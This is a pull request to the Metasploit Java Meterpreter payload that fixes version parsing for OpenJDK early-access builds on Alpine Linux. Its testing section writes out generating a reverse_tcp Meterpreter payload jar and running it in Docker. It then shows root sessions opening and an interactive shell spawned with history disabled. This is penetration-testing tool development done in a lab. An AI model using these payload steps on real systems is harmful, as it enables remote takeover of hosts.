### PR TITLE
Fix Java Meterpreter payloads failing with OpenJDK on Alpine Linux

### DIFF
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java
@@ -70,6 +70,12 @@ public class CommandManager {
             }
         }
 
+        // Early-access releases add a "-ea" suffix
+        // These are the default versions for Alpine
+        if (version.endsWith("-ea")) {
+            version = version.substring(0, version.length() - 3);
+        }
+
         return Integer.parseInt(version) + ExtensionLoader.V1_base;
     }
 


### PR DESCRIPTION
This fixes #702.

Alpine Linux is commonly used with Docker containers and the default Java platform is usually OpenJDK. Now, The only version that is available for Alpine are early-access releases of OpenJDK (see this [issue](https://github.com/docker-library/openjdk/issues/481)).

These versions have `-ea` suffix in their version strings that breaks the logic in `getVersion()` when trying to [convert](https://github.com/rapid7/metasploit-payloads/blob/d08cbb07bd238280d7ba9c66cf3f637b0d112a9a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java#L73) the string to an Integer.

```
bash-5.1# java --version
openjdk 23-ea 2024-09-17
OpenJDK Runtime Environment (build 23-ea+22-1824)
OpenJDK 64-Bit Server VM (build 23-ea+22-1824, mixed mode, sharing)
```

This fixes the issue by removing the suffix before converting the version string to an Integer.

## Testing
### Building Java Meterpreter
I recommend following these [steps](https://github.com/rapid7/metasploit-payloads/tree/master/java#building-on-docker) using Docker.

### Use Metasploit
```
msf6 > use payload/java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 192.168.144.1
lhost => 192.168.144.1
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/metasploit/Payload.class is being used
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 payload(java/meterpreter/reverse_tcp) > generate -f jar -o /home/msfuser/dev/modules_wip/fix_java_payload/test/payload.jar
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/metasploit/Payload.class is being used
[*] Writing 5263 bytes to /home/msfuser/dev/modules_wip/fix_java_payload/test/payload.jar...
```

### Run Docker with OpenJDK version 11
Make sure it still works with older versions of OpenJDK

- Docker container (Alpine Linux)
```
❯ docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp -ti openjdk:11 bash
root@6ddeee749c29:/usr/src/myapp# java -jar payload.jar
```

- Metasploit output
```
msf6 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/com/metasploit/meterpreter/JarFileClassLoader.class is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used

[*] Sending stage (58012 bytes) to 192.168.144.1
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.1:56657) at 2024-05-14 18:31:24 +0200

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : c32e524471a9
OS              : Linux 6.6.22-linuxkit (amd64)
Architecture    : x64
System Language : en
Meterpreter     : java/linux
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 1 created.
Channel 1 created.
root@c32e524471a9:/usr/src/myapp# java --version
java --version
openjdk 11.0.16 2022-07-19
OpenJDK Runtime Environment 18.9 (build 11.0.16+8)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.16+8, mixed mode, sharing)
```

### Run Docker with OpenJDK version 23
Make sure it still works with newer versions of OpenJDK

- Docker container (Alpine Linux)
```
❯ docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp -ti openjdk:23 bash
bash-5.1# java -jar payload.jar
```

- Metasploit output
```
msf6 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/com/metasploit/meterpreter/JarFileClassLoader.class is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used

[*] Sending stage (58012 bytes) to 192.168.144.1
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 2 opened (192.168.144.1:4444 -> 192.168.144.1:56666) at 2024-05-14 18:32:46 +0200

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : 40cfae6b20d8
OS              : Linux 6.6.22-linuxkit (amd64)
Architecture    : x64
System Language : en
Meterpreter     : java/linux
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 1 created.
Channel 1 created.
bash-5.1# java --version
java --version
openjdk 23-ea 2024-09-17
OpenJDK Runtime Environment (build 23-ea+22-1824)
OpenJDK 64-Bit Server VM (build 23-ea+22-1824, mixed mode, sharing)
```
